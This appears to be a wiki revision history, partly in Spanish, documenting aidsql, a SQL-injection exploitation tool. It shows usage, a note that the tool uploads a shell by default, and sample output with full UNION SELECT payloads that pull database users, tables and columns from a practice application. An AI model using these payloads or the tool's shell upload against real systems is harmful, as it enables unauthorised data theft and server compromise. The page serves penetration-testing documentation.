Recent changes to aidsql-en

aidsql-en modified by Maguey

Maguey — Wed, 11 Dec 2013 16:17:09 -0000

--- v3
+++ v4
@@ -175,7 +175,7 @@

 La herramienta de manera automática, guarda los resultados de la explotación y minado de datos dentro de la capeta interna: 
 
-Folder /logs/[application name]
+
Folder /logs/\[application name\]
 
Log file - index.php_console.log
 
XML file - index.php_db_schemas.xml

aidsql-en modified by Maguey

Maguey — Wed, 11 Dec 2013 16:16:06 -0000

--- v2
+++ v3
@@ -66,7 +66,7 @@
 

 Basic usage:
-Realizar un escaneo automático de una aplicación Web. La siguiente instrucción realiza un escaneo automático dentro una aplicación: 
+Perform an automated scan on a web application. The following instruction initiates an automated scan on the web application.

 
 ./aidSQL --url=[URL] --no-shell
@@ -75,14 +75,14 @@
 
 Dónde:
 

---url: Aplicación Web a escanear.
-
--no-shell: Deshabilita la carga de una shell
-
-
-
-Nota: Por defecto, la herramienta está configurada para realizar el minado de datos al igual que la carga de una shell propia de la herramienta de manera automática posterior al descubrimiento de un parámetro vulnerable, por lo que se recomienda utilizar la opción  --no-shell  para reducir el impacto que pudiera ocasionar.
-
-La herramienta iniciara corriendo el mapeo del sitio para identificar las páginas y parámetros dentro de la aplicación.
+--url: Web application URL address. 
+
--no-shell: Disabled the option to upload a shell. 
+
+
+
+Note: By defect the tool is configured to perform the data mining and upload a shell upon discovering a vulnerable parameter, thus it is recommended to disable the shell option to minimize the impact it may have on the web application and/or application server.
+
+The tool will begin with crawling through the web application in order to generate the site-map of the pages and parameters present.

 
 Normalized URL: http://midominio.com.mx/miaplicacion/

@@ -107,7 +107,7 @@

 



-Esta información posteriormente será utilizada para identificar los parámetros que son vulnerables por medio de la inyección de sentencias preestablecidas de SQL (sentencias “UNION”) para ser analizados dentro de las respuestas.
+This information is used next on the detection of vulnerable parameters through the injection of predefined SQL injections (UNION queries) and the analysis of the web application responses.

 
 Testing links ...

@@ -134,7 +134,7 @@

 



-Durante la ejecución del escaneo, en el caso en que la herramienta identifique un parámetro vulnerable a una inyección de SQL, iniciara el proceso de minado de la base de datos.
+During the scan execution, when a vulnerable parameter is detected, the data mining will be called to extract the information from the database.

 
 Site is vulnerable to sql injection!

@@ -166,7 +166,7 @@
 http://midominio.com.mx/miaplicacion
/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+
FROM+information_schema.columns+
WHERE+table_schema%3D0x6f776173703130+AND+table_name%3D0x6163636f756e7473%3B+--+&password=prueba&user-info-php-submit-button=View%2BAccount%2BDetails&page=user-info.php
 



-Al final de la ejecución la herramienta desplegara un reporte de cuantas vulnerabilidades de inyección de SQL detecto durante el escaneo, al igual que el tiempo total de la ejecución del escaneo. 
+When the scan is completed, the tool will display a summary report of the detected vulnerabilities and the scan duration.

 
 VULNERABLE LINKS FOUND : 1

@@ -175,12 +175,12 @@

 La herramienta de manera automática, guarda los resultados de la explotación y minado de datos dentro de la capeta interna: 
 
-Carpeta /logs/\[miaplicacion\]
-
Carpeta log - index.php_console.log
-
Carpeta xml - index.php_db_schemas.xml
-
-
-Archivo index.php_console.log
+
Folder /logs/[application name]
+
Log file - index.php_console.log
+
XML file - index.php_db_schemas.xml
+
+
+index.php_console.log file example:

 
 HOST midominio.com.mx
@@ -213,7 +213,7 @@

 



-Archivo index.php_db_schemas.xml
+index.php_db_schemas.xml file example:

 
 <schemas>

aidsql-en modified by Maguey

Maguey — Wed, 11 Dec 2013 16:08:33 -0000

--- v1
+++ v2
@@ -8,48 +8,59 @@
 

 Phase(s):
-Primary: Discovery.
+Primary: Exploitation.
 Secondary:  N/A.

 

 Description: 
-Tool that performs a vulnerability scan on web applications. It runs in two modes, the first one performs a spidering  of the web application and the second one uses dictionary based brute force attacks.
+Security application developed in PHP that helps identify and exploit in an automated way SQL Injection vulnerabilities.

 

 Objective:
 
-Detect vulnerabilities on the web application.
+
Automated detection of parameters vulnerable to SQL Injection.
+
Automated and configurable data base data mining.
+
Automated shell upload in order to comprise the application server.
 

 

 Features:
-Supported technologies: Web applications (HTTP).
+Supported technologies: Web applications (HTTP/HTTPS) with a MySQL database backend.

 Operative mode: Active.

 
-Detect vulnerabilities on the web application.
-

-Performs a predefined and configurable spidering on the web application; configurations include domain on the scope, restricted URLs and parameters, etc.
-
dentify common vulnerabilities such as Cross Site Script, SQL Injection, Path Traversal, Information Disclosure, etc.
-
Provides a configurable dictionary base brute force attack functionality in order to detect commons resources such as administrative, default and test pages, files backups (.old), etc.
-
Has the capability to include self-defined dictionaries to be used on the brute force module.
-
-
+Automated detection of parameters vulnerable to SQL Injection.
+
+Automated parameter tampering for both URL parameters (GET) and form data (POST).
+
Generates a configurable site-map of the application in order to identify all its resources: pages and parameters for further testing.
+
Provides the name of the parameter and URL from the detected vulnerabilities.
+
+
+
+
+Automated and configurable data base data mining.
+

+Retrieves the following information 
+
+Database user name.
+
Database name.
+
Database version.
+
Database tables.
+
Database tables schema: keys, fields names and type.
+
+
+
+

 
 Reports:

 Output reports:  ✔
-

-Reports in HTML format which includes the visited URLS and detected vulnerabilities divided into three sections:
-

-URL: URLs detected by the spidering module.
-
Document type: URL categorization by content based on the response.
-
Detected vulnerabilities: URL groups by matching vulnerabilities.
-
+
+Merge report from the exploitation and data mining in TXT and XML format.

aidsql-en modified by Maguey

Maguey — Wed, 11 Dec 2013 15:30:18 -0000

Back Español

aidsql

Phase(s):

Primary: Discovery.
Secondary: N/A.

Description:

Tool that performs a vulnerability scan on web applications. It runs in two modes, the first one performs a spidering of the web application and the second one uses dictionary based brute force attacks.

Objective:

Detect vulnerabilities on the web application.

Features:

Supported technologies: Web applications (HTTP).

Operative mode: Active.

Detect vulnerabilities on the web application.

Performs a predefined and configurable spidering on the web application; configurations include domain on the scope, restricted URLs and parameters, etc.
dentify common vulnerabilities such as Cross Site Script, SQL Injection, Path Traversal, Information Disclosure, etc.
Provides a configurable dictionary base brute force attack functionality in order to detect commons resources such as administrative, default and test pages, files backups (.old), etc.
Has the capability to include self-defined dictionaries to be used on the brute force module.

Reports:
Output reports: ✔
Reports in HTML format which includes the visited URLS and detected vulnerabilities divided into three sections:

URL: URLs detected by the spidering module.
Document type: URL categorization by content based on the response.
Detected vulnerabilities: URL groups by matching vulnerabilities.

Basic usage:

Realizar un escaneo automático de una aplicación Web. La siguiente instrucción realiza un escaneo automático dentro una aplicación:

./aidSQL --url=[URL] --no-shell

Dónde:

--url: Aplicación Web a escanear.
--no-shell: Deshabilita la carga de una shell

Nota: Por defecto, la herramienta está configurada para realizar el minado de datos al igual que la carga de una shell propia de la herramienta de manera automática posterior al descubrimiento de un parámetro vulnerable, por lo que se recomienda utilizar la opción --no-shell para reducir el impacto que pudiera ocasionar.

La herramienta iniciara corriendo el mapeo del sitio para identificar las páginas y parámetros dentro de la aplicación.

Normalized URL: http://midominio.com.mx/miaplicacion/

Crawling ...

Fetching content from http://midominio.com.mx/miaplicacion/

200 OK

TOTAL URL's found: 55

Add file index.jsp ...

Page "index.jsp" matches required types php,asp,aspx,cfm,do,jsp,htm,html

Add URL " http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome"

Parsing previously crawled URL, looking for new parameters

Adding new parameter "do"

Esta información posteriormente será utilizada para identificar los parámetros que son vulnerables por medio de la inyección de sentencias preestablecidas de SQL (sentencias “UNION”) para ser analizados dentro de las respuestas.

Testing links ...

1. { http://midominio.com.mx/miaplicacion/index.jsp }

Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp
Set method GET …

Load sqli => mysql5 ... OK

Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome

sql injection plugin...

[1][ [message] | METHOD: unionQuery

[QUERY] | b54293624e8b649e5e948364b6e4a9cb UNION ALL SELECT CONCAT(0x3c61696473716c3e,1,0x3c2f61696473716c3e)/*

Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=b54293624e8b649e5e948364b6e4a9cb+
UNION+ALL+SELECT+CONCAT%280x3c61696473716c3e%2C1%2C0x3c2f61696473716c3e%29%2F%2A
[WW] WARNING: GOT 403

[2][ message] | METHOD: unionQuery …

Durante la ejecución del escaneo, en el caso en que la herramienta identifique un parámetro vulnerable a una inyección de SQL, iniciara el proceso de minado de la base de datos.

Site is vulnerable to sql injection!

Skipping calling plugin's get shell method

Fetching database user ...

[message] | METHOD: unionQuery

[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,USER(),0x3c2f61696473716c3e),3,4,5; -- Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+UNION+ALL+
SELECT+1%2CCONCAT%280x3c61696473716c3e%2CUSER%28%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5%3B+--+
FOUND DATABASE seguridad
[message] | METHOD: unionQuery

[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
(TABLE_NAME,0x7c,TABLE_TYPE,0x7c,ENGINE,0x7c,TABLE_COLLATION,0x7c,
IF(AUTO_INCREMENT,1,0)),0x3c2f61696473716c3e),3,4,5 FROM information_schema.tables WHERE table_schema=0x6f776173703130; --
Normalized URL:
http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
TABLE_NAME%2C0x7c%2CTABLE_TYPE%2C0x7c%2CENGINE%2C0x7c%2C
TABLE_COLLATION%2C0x7c%2CIF%28AUTO_INCREMENT%2C1%2C0%29%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+FROM+information_schema.tables+WHERE+table_schema%3D0x6f776173703130%3B+--+
Fetching table "cuentas" columns ...

[message] | METHOD: unionQuery

[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
(COLUMN_NAME,0x7c,COLUMN_TYPE,0x7c,IF(COLUMN_KEY,COLUMN_KEY,0),0x7c,IF(EXTRA,EXTRA,0) SEPARATOR 0x25),0x3c2f61696473716c3e),3,4,5
FROM information_schema.columns WHERE table_schema=0x6f776173703130 AND table_name=0x6163636f756e7473; --
Normalized URL:
http://midominio.com.mx/miaplicacion
/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+
FROM+information_schema.columns+
WHERE+table_schema%3D0x6f776173703130+AND+table_name%3D0x6163636f756e7473%3B+--+&password=prueba&user-info-php-submit-button=View%2BAccount%2BDetails&page=user-info.php

Al final de la ejecución la herramienta desplegara un reporte de cuantas vulnerabilidades de inyección de SQL detecto durante el escaneo, al igual que el tiempo total de la ejecución del escaneo.

VULNERABLE LINKS FOUND : 1
TOTAL TIME : 53 seconds

La herramienta de manera automática, guarda los resultados de la explotación y minado de datos dentro de la capeta interna:

Carpeta /logs/[miaplicacion]
Carpeta log - index.php_console.log
Carpeta xml - index.php_db_schemas.xml

Archivo index.php_console.log

HOST midominio.com.mx ------------------------------------
PLUGIN NAME : UNION
PLUGIN AUTHOR : Juan Stange
REQUEST VARIABLES : message, do, info, page,…
VULNERABLE LINK : http://midominio.com.mx/miaplicacion
/index.jsp?message==0eb751e9f79eb91238fc1902844d30e6%27+UNION+ALL+
SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e
%29%2C3%2C4%2C5+FROM+information_schema.columns+WHERE+
table_schema%3D0x6f776173703130+AND+table_name%3D0x70656e5f746573745f746f6f6c73%3B+--+
------------------------------------------------
SCHEMA seguridad
------------------------------------------------
VERSION : 5.5.16
DATADIR :

TABLE cuentas
---------------------
type : BASE TABLE
engine : InnoDB
collation : latin1_swedish_ci
increment : 1

COLUMNS
---------------------
NAME : cid
type int(11)
key 0
extra 0
NAME : username
…

Archivo index.php_db_schemas.xml

<schemas>
<database name="owasp10" version="5.5.16" datadir="">
<tables>
<table name="accounts" type="BASE TABLE" engine="InnoDB" collation="latin1_swedish_ci" increment="1">
<column name="cid"><type>int(11)</type><key>0</key><extra>0</extra></column>
<column name="username"><type>text</type><key>0</key><extra>0</extra></column>
…

Resources:

Link: http://code.google.com/p/aidsql/.
Author(s): jpfstange
LynxSec IT consulting and security.
Contact: lynxsec [at] gmail.com
IRC: irc.freenode.net #aidsql
Twitter: http://twitter.com/#!aidsql
License: GNU GPL v2